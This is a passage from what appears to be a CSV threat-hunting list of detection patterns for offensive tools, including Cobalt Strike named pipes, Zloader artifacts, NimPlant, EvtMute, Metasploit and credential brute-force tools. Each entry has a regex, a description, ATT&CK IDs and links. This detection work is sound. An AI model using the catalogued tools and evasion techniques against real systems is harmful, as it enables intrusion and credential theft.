Evasion","https://github.com/Tylous/ZipExec","1","1","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*ZipExec/Loader*",".{0,1000}ZipExec\/Loader.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","1","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*--ZipFileName $TrustedDomain.zip*",".{0,1000}\-\-ZipFileName\s\$TrustedDomain\.zip.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*zippy.nim*",".{0,1000}zippy\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*Zloader-FCVP*",".{0,1000}Zloader\-FCVP.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/","1","0","N/A","7","10","N/A","N/A","N/A","N/A" "*ZnVuY3Rpb24gRG9udXQtTG9hZGVyIHtwYXJhbSgkcHJvY2Vzc19pZCwkZG9udXRmaWx*",".{0,1000}ZnVuY3Rpb24gRG9udXQtTG9hZGVyIHtwYXJhbSgkcHJvY2Vzc19pZCwkZG9udXRmaWx.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the 
events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*ZnVuY3Rpb24gRGxsLUxvYWRlciB7CiAgICBwYXJhbShbc3dpdGNoXSRzbWIsIFtzd2l0Y*",".{0,1000}ZnVuY3Rpb24gRGxsLUxvYWRlciB7CiAgICBwYXJhbShbc3dpdGNoXSRzbWIsIFtzd2l0Y.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*ZnVuY3Rpb24gSW52b2tlLUJpbmFyeSB7cGFyYW0oJGFyZykKICAgICRoZWxwPUAi*",".{0,1000}ZnVuY3Rpb24gSW52b2tlLUJpbmFyeSB7cGFyYW0oJGFyZykKICAgICRoZWxwPUAi.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*zoom1.msi.gpg*",".{0,1000}zoom1\.msi\.gpg.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","7","10","N/A","N/A","N/A","N/A" "*zoom2.dll.gpg*",".{0,1000}zoom2\.dll\.gpg.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and 
Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","7","10","N/A","N/A","N/A","N/A" "*zs5460/portscan*",".{0,1000}zs5460\/portscan.{0,1000}","offensive_tool_keyword","portscan","A simple TCP and UDP portscanner written in Go","T1595 - T1596 - T1594","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/zs5460/portscan","1","1","N/A","N/A","1","14","4","2022-11-11T09:26:47Z","2019-06-04T09:00:00Z" "*zsh_executor *",".{0,1000}zsh_executor\s.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*zsploit-1.txt*",".{0,1000}zsploit\-1\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*zsploit-2.txt*",".{0,1000}zsploit\-2\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ztgrace*changeme*",".{0,1000}ztgrace.{0,1000}changeme.{0,1000}","offensive_tool_keyword","changeme","A default credential scanner.","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ztgrace/changeme","1","1","N/A","N/A","10","1404","265","2021-12-26T10:20:11Z","2016-03-11T17:10:34Z" "*ZxKmz4hXp6XKmTPg9lzgYxXN4sFr2pzo*",".{0,1000}ZxKmz4hXp6XKmTPg9lzgYxXN4sFr2pzo.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","7","1","47","10","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z" "*ZXZpZGVuY2UuZmJpLmdvdg==*",".{0,1000}ZXZpZGVuY2UuZmJpLmdvdg\=\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*zyn3rgy/LdapRelayScan*",".{0,1000}zyn3rgy\/LdapRelayScan.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - 
TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","5","427","61","2024-03-13T20:04:51Z","2022-01-16T06:50:44Z" "*zzzteph/weakpass*",".{0,1000}zzzteph\/weakpass.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*Zzzz Zzzzz Zzzz....*",".{0,1000}Zzzz\sZzzzz\sZzzz\.\.\.\..{0,1000}","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","N/A","9","3","217","37","2023-11-29T21:58:34Z","2023-08-05T19:24:36Z" "./beef","\.\/beef","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "./CVE-202* -*","\.\/CVE\-20.{0,1000}\s\-.{0,1000}","offensive_tool_keyword","POC","CVE POC execution","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/tangxiaofeng7/CVE-2022-22965-Spring-CachedintrospectionResults-Rce","1","0","N/A","N/A","1","38","14","2022-04-01T08:44:19Z","2022-04-01T07:55:26Z" "./radare *","\.\/radare\s.{0,1000}","offensive_tool_keyword","RadareEye","Tool built specifically for scanning nearby devices and executing a given command on its own system when the target device comes in range.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Network Exploitation tools","https://github.com/souravbaghz/RadareEye","1","0","N/A","N/A","4","351","52","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z" "/adhunt.py","\/adhunt\.py","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "\\demoagent_11","\\\\demoagent_11","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\demoagent_22","\\\\demoagent_22","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 
17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\DserNamePipe*","\\\\DserNamePipe.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\f4c3*","\\\\f4c3.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 
- T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\f53f*","\\\\f53f.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon 
EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\fullduplex_*","\\\\fullduplex_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\interprocess_*","\\\\interprocess_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\lsarpc_*","\\\\lsarpc_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\mojo_*","\\\\mojo_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\msagent_*","\\\\msagent_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\MsFteWds*","\\\\MsFteWds.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\msrpc_*","\\\\msrpc_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\MSSE-*","\\\\MSSE\-.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
